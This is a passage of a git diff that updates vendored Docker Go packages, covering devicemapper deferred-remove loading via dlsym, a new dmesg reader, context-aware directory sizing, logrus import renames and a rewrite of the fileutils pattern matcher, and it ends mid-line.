--- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go @@ -1,14 +1,15 @@ -// +build linux,!libdm_no_deferred_remove +// +build linux,cgo,!static_build +// +build !libdm_dlsym_deferred_remove,!libdm_no_deferred_remove -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" /* -#cgo LDFLAGS: -L. -ldevmapper #include */ import "C" -// LibraryDeferredRemovalSupport is supported when statically linked. +// LibraryDeferredRemovalSupport tells if the feature is supported by the +// current Docker invocation. const LibraryDeferredRemovalSupport = true func dmTaskDeferredRemoveFct(task *cdmTask) int { diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go new file mode 100644 index 0000000000..5dfb369f1f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go @@ -0,0 +1,128 @@ +// +build linux,cgo,!static_build +// +build libdm_dlsym_deferred_remove,!libdm_no_deferred_remove + +package devicemapper + +/* +#cgo LDFLAGS: -ldl +#include +#include +#include + +// Yes, I know this looks scary. In order to be able to fill our own internal +// dm_info with deferred_remove we need to have a struct definition that is +// correct (regardless of the version of libdm that was used to compile it). To +// this end, we define struct_backport_dm_info. This code comes from lvm2, and +// I have verified that the structure has only ever had elements *appended* to +// it (since 2001). +// +// It is also important that this structure be _larger_ than the dm_info that +// libdevmapper expected. Otherwise libdm might try to write to memory it +// shouldn't (they don't have a "known size" API). +struct backport_dm_info { + int exists; + int suspended; + int live_table; + int inactive_table; + int32_t open_count; + uint32_t event_nr; + uint32_t major; + uint32_t minor; + int read_only; + + int32_t target_count; + + int deferred_remove; + int internal_suspend; + + // Padding, purely for our own safety. This is to avoid cases where libdm + // was updated underneath us and we call into dm_task_get_info() with too + // small of a buffer. + char _[512]; +}; + +// We have to wrap this in CGo, because Go really doesn't like function pointers. +int call_dm_task_deferred_remove(void *fn, struct dm_task *task) +{ + int (*_dm_task_deferred_remove)(struct dm_task *task) = fn; + return _dm_task_deferred_remove(task); +} +*/ +import "C" + +import ( + "unsafe" + + "github.com/sirupsen/logrus" +) + +// dm_task_deferred_remove is not supported by all distributions, due to +// out-dated versions of devicemapper. However, in the case where the +// devicemapper library was updated without rebuilding Docker (which can happen +// in some distributions) then we should attempt to dynamically load the +// relevant object rather than try to link to it. + +// dmTaskDeferredRemoveFct is a "bound" version of dm_task_deferred_remove. +// It is nil if dm_task_deferred_remove was not found in the libdevmapper that +// is currently loaded. +var dmTaskDeferredRemovePtr unsafe.Pointer + +// LibraryDeferredRemovalSupport tells if the feature is supported by the +// current Docker invocation. This value is fixed during init. +var LibraryDeferredRemovalSupport bool + +func init() { + // Clear any errors. + var err *C.char + C.dlerror() + + // The symbol we want to fetch. + symName := C.CString("dm_task_deferred_remove") + defer C.free(unsafe.Pointer(symName)) + + // See if we can find dm_task_deferred_remove. Since we already are linked + // to libdevmapper, we can search our own address space (rather than trying + // to guess what libdevmapper is called). We use NULL here, as RTLD_DEFAULT + // is not available in CGO (even if you set _GNU_SOURCE for some reason). + // The semantics are identical on glibc. + sym := C.dlsym(nil, symName) + err = C.dlerror() + if err != nil { + logrus.Debugf("devmapper: could not load dm_task_deferred_remove: %s", C.GoString(err)) + return + } + + logrus.Debugf("devmapper: found dm_task_deferred_remove at %x", uintptr(sym)) + dmTaskDeferredRemovePtr = sym + LibraryDeferredRemovalSupport = true +} + +func dmTaskDeferredRemoveFct(task *cdmTask) int { + sym := dmTaskDeferredRemovePtr + if sym == nil || !LibraryDeferredRemovalSupport { + return -1 + } + return int(C.call_dm_task_deferred_remove(sym, (*C.struct_dm_task)(task))) +} + +func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int { + if !LibraryDeferredRemovalSupport { + return -1 + } + + Cinfo := C.struct_backport_dm_info{} + defer func() { + info.Exists = int(Cinfo.exists) + info.Suspended = int(Cinfo.suspended) + info.LiveTable = int(Cinfo.live_table) + info.InactiveTable = int(Cinfo.inactive_table) + info.OpenCount = int32(Cinfo.open_count) + info.EventNr = uint32(Cinfo.event_nr) + info.Major = uint32(Cinfo.major) + info.Minor = uint32(Cinfo.minor) + info.ReadOnly = int(Cinfo.read_only) + info.TargetCount = int32(Cinfo.target_count) + info.DeferredRemove = int(Cinfo.deferred_remove) + }() + return int(C.dm_task_get_info((*C.struct_dm_task)(task), (*C.struct_dm_info)(unsafe.Pointer(&Cinfo)))) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go index 8249ccf854..8889f0f46f 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go @@ -1,8 +1,10 @@ -// +build linux,libdm_no_deferred_remove +// +build linux,cgo +// +build !libdm_dlsym_deferred_remove,libdm_no_deferred_remove -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" -// LibraryDeferredRemovalSupport is not supported when statically linked. +// LibraryDeferredRemovalSupport tells if the feature is supported by the +// current Docker invocation. const LibraryDeferredRemovalSupport = false func dmTaskDeferredRemoveFct(task *cdmTask) int { diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go index 581b57eb86..ec5a0b33ba 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go @@ -1,15 +1,16 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" import ( - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func ioctlBlkGetSize64(fd uintptr) (int64, error) { var size int64 - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 { return 0, err } return size, nil @@ -20,7 +21,7 @@ func ioctlBlkDiscard(fd uintptr, offset, length uint64) error { r[0] = offset r[1] = length - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 { return err } return nil diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/log.go b/vendor/github.com/docker/docker/pkg/devicemapper/log.go index cee5e54549..dd330ba4f8 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/log.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/log.go @@ -1,4 +1,4 @@ -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" // definitions from lvm2 lib/log/log.h const ( diff --git a/vendor/github.com/docker/docker/pkg/directory/directory.go b/vendor/github.com/docker/docker/pkg/directory/directory.go index 1715ef45d9..51d4a6ea22 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory.go @@ -1,4 +1,4 @@ -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_test.go b/vendor/github.com/docker/docker/pkg/directory/directory_test.go index 2b7a4657be..ea62bdf236 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory_test.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory_test.go @@ -1,6 +1,7 @@ -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( + "context" "io/ioutil" "os" "path/filepath" @@ -18,7 +19,7 @@ func TestSizeEmpty(t *testing.T) { } var size int64 - if size, _ = Size(dir); size != 0 { + if size, _ = Size(context.Background(), dir); size != 0 { t.Fatalf("empty directory has size: %d", size) } } @@ -37,7 +38,7 @@ func TestSizeEmptyFile(t *testing.T) { } var size int64 - if size, _ = Size(file.Name()); size != 0 { + if size, _ = Size(context.Background(), file.Name()); size != 0 { t.Fatalf("directory with one file has size: %d", size) } } @@ -59,7 +60,7 @@ func TestSizeNonemptyFile(t *testing.T) { file.Write(d) var size int64 - if size, _ = Size(file.Name()); size != 5 { + if size, _ = Size(context.Background(), file.Name()); size != 5 { t.Fatalf("directory with one 5-byte file has size: %d", size) } } @@ -76,7 +77,7 @@ func TestSizeNestedDirectoryEmpty(t *testing.T) { } var size int64 - if size, _ = Size(dir); size != 0 { + if size, _ = Size(context.Background(), dir); size != 0 { t.Fatalf("directory with one empty directory has size: %d", size) } } @@ -101,7 +102,7 @@ func TestSizeFileAndNestedDirectoryEmpty(t *testing.T) { file.Write(d) var size int64 - if size, _ = Size(dir); size != 6 { + if size, _ = Size(context.Background(), dir); size != 6 { t.Fatalf("directory with 6-byte file and empty directory has size: %d", size) } } @@ -134,7 +135,7 @@ func TestSizeFileAndNestedDirectoryNonempty(t *testing.T) { nestedFile.Write(nestedData) var size int64 - if size, _ = Size(dir); size != 12 { + if size, _ = Size(context.Background(), dir); size != 12 { t.Fatalf("directory with 6-byte file and nested directory with 6-byte file has size: %d", size) } } @@ -186,7 +187,7 @@ func TestMoveToSubdir(t *testing.T) { // Test a non-existing directory func TestSizeNonExistingDirectory(t *testing.T) { - if _, err := Size("/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil { + if _, err := Size(context.Background(), "/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil { t.Fatalf("error is expected") } } diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go index 397251bdb8..f56dd7a8f9 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go @@ -1,15 +1,16 @@ -// +build linux freebsd solaris +// +build linux freebsd darwin -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( + "context" "os" "path/filepath" "syscall" ) // Size walks a directory tree and returns its total size in bytes. -func Size(dir string) (size int64, err error) { +func Size(ctx context.Context, dir string) (size int64, err error) { data := make(map[uint64]struct{}) err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { if err != nil { @@ -20,6 +21,11 @@ func Size(dir string) (size int64, err error) { } return err } + select { + case <-ctx.Done(): + return ctx.Err() + default: + } // Ignore directory sizes if fileInfo == nil { @@ -34,11 +40,11 @@ func Size(dir string) (size int64, err error) { // Check inode to handle hard links correctly inode := fileInfo.Sys().(*syscall.Stat_t).Ino // inode is not a uint64 on all platforms. Cast it to avoid issues. - if _, exists := data[uint64(inode)]; exists { + if _, exists := data[inode]; exists { return nil } // inode is not a uint64 on all platforms. Cast it to avoid issues. - data[uint64(inode)] = struct{}{} + data[inode] = struct{}{} size += s diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go index 6fb0917c4c..f07f241880 100644 --- a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go +++ b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go @@ -1,14 +1,13 @@ -// +build windows - -package directory +package directory // import "github.com/docker/docker/pkg/directory" import ( + "context" "os" "path/filepath" ) // Size walks a directory tree and returns its total size in bytes. -func Size(dir string) (size int64, err error) { +func Size(ctx context.Context, dir string) (size int64, err error) { err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error { if err != nil { // if dir does not exist, Size() returns the error. @@ -19,6 +18,12 @@ func Size(dir string) (size int64, err error) { return err } + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + // Ignore directory sizes if fileInfo == nil { return nil diff --git a/vendor/github.com/docker/docker/pkg/discovery/README.md b/vendor/github.com/docker/docker/pkg/discovery/README.md index 39777c2171..d8ed9ce71e 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/README.md +++ b/vendor/github.com/docker/docker/pkg/discovery/README.md @@ -17,7 +17,7 @@ the address Docker uses to advertise the node using the `--cluster-advertise` flag. ```bash -$ docker daemon -H= --cluster-advertise= --cluster-store etcd://,/ +$ dockerd -H= --cluster-advertise= --cluster-store etcd://,/ ``` ### Using consul @@ -27,7 +27,7 @@ the address Docker uses to advertise the node using the `--cluster-advertise` flag. ```bash -$ docker daemon -H= --cluster-advertise= --cluster-store consul:/// +$ dockerd -H= --cluster-advertise= --cluster-store consul:/// ``` ### Using zookeeper @@ -37,5 +37,5 @@ the address Docker uses to advertise the node using the `--cluster-advertise` flag. ```bash -$ docker daemon -H= --cluster-advertise= --cluster-store zk://,/ +$ dockerd -H= --cluster-advertise= --cluster-store zk://,/ ``` diff --git a/vendor/github.com/docker/docker/pkg/discovery/backends.go b/vendor/github.com/docker/docker/pkg/discovery/backends.go index 2eab550e29..1d038285ad 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/backends.go +++ b/vendor/github.com/docker/docker/pkg/discovery/backends.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "fmt" @@ -6,7 +6,7 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) var ( diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery.go b/vendor/github.com/docker/docker/pkg/discovery/discovery.go index ca7f587458..828c5ca488 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/discovery.go +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go index 6084f3ef0d..ffe8cb9122 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/discovery/entry.go b/vendor/github.com/docker/docker/pkg/discovery/entry.go index ce23bbf89b..be06c75787 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/entry.go +++ b/vendor/github.com/docker/docker/pkg/discovery/entry.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import "net" diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file.go b/vendor/github.com/docker/docker/pkg/discovery/file/file.go index 2b8e27b754..1494af485f 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/file/file.go +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file.go @@ -1,4 +1,4 @@ -package file +package file // import "github.com/docker/docker/pkg/discovery/file" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go index 667f00ba0d..010e941c2a 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go @@ -1,4 +1,4 @@ -package file +package file // import "github.com/docker/docker/pkg/discovery/file" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator.go b/vendor/github.com/docker/docker/pkg/discovery/generator.go index d22298298f..788015fe23 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/generator.go +++ b/vendor/github.com/docker/docker/pkg/discovery/generator.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go index 6281c46665..5126df576e 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go @@ -1,4 +1,4 @@ -package discovery +package discovery // import "github.com/docker/docker/pkg/discovery" import ( "github.com/go-check/check" diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go index 77eee7d454..30fe6714c8 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go @@ -1,4 +1,4 @@ -package kv +package kv // import "github.com/docker/docker/pkg/discovery/kv" import ( "fmt" @@ -6,7 +6,6 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/discovery" "github.com/docker/go-connections/tlsconfig" "github.com/docker/libkv" @@ -14,6 +13,7 @@ import ( "github.com/docker/libkv/store/consul" "github.com/docker/libkv/store/etcd" "github.com/docker/libkv/store/zookeeper" + "github.com/sirupsen/logrus" ) const ( diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go index dab3939dd0..79fd91c61f 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go @@ -1,4 +1,4 @@ -package kv +package kv // import "github.com/docker/docker/pkg/discovery/kv" import ( "errors" @@ -11,7 +11,6 @@ import ( "github.com/docker/docker/pkg/discovery" "github.com/docker/libkv" "github.com/docker/libkv/store" - "github.com/go-check/check" ) @@ -130,7 +129,6 @@ func (s *Mock) AtomicDelete(key string, previous *store.KVPair) (bool, error) { // Close mock func (s *Mock) Close() { - return } func (ds *DiscoverySuite) TestInitializeWithCerts(c *check.C) { diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go index ba8b1f55f3..81f973e285 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go @@ -1,4 +1,4 @@ -package memory +package memory // import "github.com/docker/docker/pkg/discovery/memory" import ( "sync" diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go index c2da0a068e..1d937f0160 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go @@ -1,4 +1,4 @@ -package memory +package memory // import "github.com/docker/docker/pkg/discovery/memory" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go index c0e3c07b22..b1d45aa2e6 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go @@ -1,4 +1,4 @@ -package nodes +package nodes // import "github.com/docker/docker/pkg/discovery/nodes" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go index e26568cf54..f9b43ab00b 100644 --- a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go @@ -1,4 +1,4 @@ -package nodes +package nodes // import "github.com/docker/docker/pkg/discovery/nodes" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go new file mode 100644 index 0000000000..bc71b5b31f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go @@ -0,0 +1,18 @@ +package dmesg // import "github.com/docker/docker/pkg/dmesg" + +import ( + "unsafe" + + "golang.org/x/sys/unix" +) + +// Dmesg returns last messages from the kernel log, up to size bytes +func Dmesg(size int) []byte { + t := uintptr(3) // SYSLOG_ACTION_READ_ALL + b := make([]byte, size) + amt, _, err := unix.Syscall(unix.SYS_SYSLOG, t, uintptr(unsafe.Pointer(&b[0])), uintptr(len(b))) + if err != 0 { + return []byte{} + } + return b[:amt] +} diff --git a/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go new file mode 100644 index 0000000000..cc20ff9165 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go @@ -0,0 +1,9 @@ +package dmesg // import "github.com/docker/docker/pkg/dmesg" + +import ( + "testing" +) + +func TestDmesg(t *testing.T) { + t.Logf("dmesg output follows:\n%v", string(Dmesg(512))) +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go index 7a81cbda95..8b6cb56f17 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go @@ -1,7 +1,7 @@ // Package filenotify provides a mechanism for watching file(s) for changes. // Generally leans on fsnotify, but provides a poll-based notifier which fsnotify does not support. // These are wrapped up in a common interface so that either can be used interchangeably in your code. -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import "github.com/fsnotify/fsnotify" diff --git a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go index 5d08a997a0..5a737d6530 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go @@ -1,8 +1,8 @@ -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import "github.com/fsnotify/fsnotify" -// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifer interface +// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifier interface type fsNotifyWatcher struct { *fsnotify.Watcher } diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller.go b/vendor/github.com/docker/docker/pkg/filenotify/poller.go index dc5ccd0f7f..22f1897034 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/poller.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller.go @@ -1,4 +1,4 @@ -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import ( "errors" @@ -7,7 +7,7 @@ import ( "sync" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" "github.com/fsnotify/fsnotify" ) @@ -15,8 +15,8 @@ import ( var ( // errPollerClosed is returned when the poller is closed errPollerClosed = errors.New("poller is closed") - // errNoSuchPoller is returned when trying to remove a watch that doesn't exist - errNoSuchWatch = errors.New("poller does not exist") + // errNoSuchWatch is returned when trying to remove a watch that doesn't exist + errNoSuchWatch = errors.New("watch does not exist") ) // watchWaitTime is the time to wait between file poll loops @@ -44,7 +44,7 @@ func (w *filePoller) Add(name string) error { w.mu.Lock() defer w.mu.Unlock() - if w.closed == true { + if w.closed { return errPollerClosed } @@ -78,7 +78,7 @@ func (w *filePoller) Remove(name string) error { } func (w *filePoller) remove(name string) error { - if w.closed == true { + if w.closed { return errPollerClosed } diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go index b4c7825112..a46b60d94f 100644 --- a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go @@ -1,4 +1,4 @@ -package filenotify +package filenotify // import "github.com/docker/docker/pkg/filenotify" import ( "fmt" @@ -61,7 +61,7 @@ func TestPollerEvent(t *testing.T) { default: } - if err := ioutil.WriteFile(f.Name(), []byte("hello"), 644); err != nil { + if err := ioutil.WriteFile(f.Name(), []byte("hello"), 0644); err != nil { t.Fatal(err) } if err := assertEvent(w, fsnotify.Write); err != nil { @@ -108,7 +108,7 @@ func assertEvent(w FileWatcher, eType fsnotify.Op) error { select { case e := <-w.Events(): if e.Op != eType { - err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e) + err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e.Op) } case e := <-w.Errors(): err = fmt.Errorf("got unexpected error waiting for events %v: %v", eType, e) diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go index c63ae75ce8..28cad499aa 100644 --- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go @@ -1,4 +1,4 @@ -package fileutils +package fileutils // import "github.com/docker/docker/pkg/fileutils" import ( "errors" @@ -10,101 +10,77 @@ import ( "strings" "text/scanner" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) -// exclusion returns true if the specified pattern is an exclusion -func exclusion(pattern string) bool { - return pattern[0] == '!' +// PatternMatcher allows checking paths against a list of patterns +type PatternMatcher struct { + patterns []*Pattern + exclusions bool } -// empty returns true if the specified pattern is empty -func empty(pattern string) bool { - return pattern == "" -} - -// CleanPatterns takes a slice of patterns returns a new -// slice of patterns cleaned with filepath.Clean, stripped -// of any empty patterns and lets the caller know whether the -// slice contains any exception patterns (prefixed with !). -func CleanPatterns(patterns []string) ([]string, [][]string, bool, error) { - // Loop over exclusion patterns and: - // 1. Clean them up. - // 2. Indicate whether we are dealing with any exception rules. - // 3. Error if we see a single exclusion marker on its own (!). - cleanedPatterns := []string{} - patternDirs := [][]string{} - exceptions := false - for _, pattern := range patterns { +// NewPatternMatcher creates a new matcher object for specific patterns that can +// be used later to match against patterns against paths +func NewPatternMatcher(patterns []string) (*PatternMatcher, error) { + pm := &PatternMatcher{ + patterns: make([]*Pattern, 0, len(patterns)), + } + for _, p := range patterns { // Eliminate leading and trailing whitespace. - pattern = strings.TrimSpace(pattern) - if empty(pattern) { + p = strings.TrimSpace(p) + if p == "" { continue } - if exclusion(pattern) { - if len(pattern) == 1 { - return nil, nil, false, errors.New("Illegal exclusion pattern: !") + p = filepath.Clean(p) + newp := &Pattern{} + if p[0] == '!' { + if len(p) == 1 { + return nil, errors.New("illegal exclusion pattern: \"!\"") } - exceptions = true + newp.exclusion = true + p = p[1:] + pm.exclusions = true } - pattern = filepath.Clean(pattern) - cleanedPatterns = append(cleanedPatterns, pattern) - if exclusion(pattern) { - pattern = pattern[1:] + // Do some syntax checking on the pattern. + // filepath's Match() has some really weird rules that are inconsistent + // so instead of trying to dup their logic, just call Match() for its + // error state and if there is an error in the pattern return it. + // If this becomes an issue we can remove this since its really only + // needed in the error (syntax) case - which isn't really critical. + if _, err := filepath.Match(p, "."); err != nil { + return nil, err } - patternDirs = append(patternDirs, strings.Split(pattern, string(os.PathSeparator))) + newp.cleanedPattern = p + newp.dirs = strings.Split(p, string(os.PathSeparator)) + pm.patterns = append(pm.patterns, newp) } - - return cleanedPatterns, patternDirs, exceptions, nil + return pm, nil } -// Matches returns true if file matches any of the patterns -// and isn't excluded by any of the subsequent patterns. -func Matches(file string, patterns []string) (bool, error) { - file = filepath.Clean(file) - - if file == "." { - // Don't let them exclude everything, kind of silly. - return false, nil - } - - patterns, patDirs, _, err := CleanPatterns(patterns) - if err != nil { - return false, err - } - - return OptimizedMatches(file, patterns, patDirs) -} - -// OptimizedMatches is basically the same as fileutils.Matches() but optimized for archive.go. -// It will assume that the inputs have been preprocessed and therefore the function -// doesn't need to do as much error checking and clean-up. This was done to avoid -// repeating these steps on each file being checked during the archive process. -// The more generic fileutils.Matches() can't make these assumptions. -func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, error) { +// Matches matches path against all the patterns. Matches is not safe to be +// called concurrently +func (pm *PatternMatcher) Matches(file string) (bool, error) { matched := false file = filepath.FromSlash(file) parentPath := filepath.Dir(file) parentPathDirs := strings.Split(parentPath, string(os.PathSeparator)) - for i, pattern := range patterns { + for _, pattern := range pm.patterns { negative := false - if exclusion(pattern) { + if pattern.exclusion { negative = true - pattern = pattern[1:] } - match, err := regexpMatch(pattern, file) + match, err := pattern.match(file) if err != nil { - return false, fmt.Errorf("Error in pattern (%s): %s", pattern, err) + return false, err } if !match && parentPath != "." { // Check to see if the pattern matches one of our parent dirs. - if len(patDirs[i]) <= len(parentPathDirs) { - match, _ = regexpMatch(strings.Join(patDirs[i], string(os.PathSeparator)), - strings.Join(parentPathDirs[:len(patDirs[i])], string(os.PathSeparator))) + if len(pattern.dirs) <= len(parentPathDirs) { + match, _ = pattern.match(strings.Join(parentPathDirs[:len(pattern.dirs)], string(os.PathSeparator))) } } @@ -120,28 +96,49 @@ func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, return matched, nil } -// regexpMatch tries to match the logic of filepath.Match but -// does so using regexp logic. We do this so that we can expand the -// wildcard set to include other things, like "**" to mean any number -// of directories. This means that we should be backwards compatible -// with filepath.Match(). We'll end up supporting more stuff, due to -// the fact that we're using regexp, but that's ok - it does no harm. -// -// As per the comment in golangs filepath.Match, on Windows, escaping -// is disabled. Instead, '\\' is treated as path separator. -func regexpMatch(pattern, path string) (bool, error) { - regStr := "^" +// Exclusions returns true if any of the patterns define exclusions +func (pm *PatternMatcher) Exclusions() bool { + return pm.exclusions +} - // Do some syntax checking on the pattern. - // filepath's Match() has some really weird rules that are inconsistent - // so instead of trying to dup their logic, just call Match() for its - // error state and if there is an error in the pattern return it. - // If this becomes an issue we can remove this since its really only - // needed in the error (syntax) case - which isn't really critical. - if _, err := 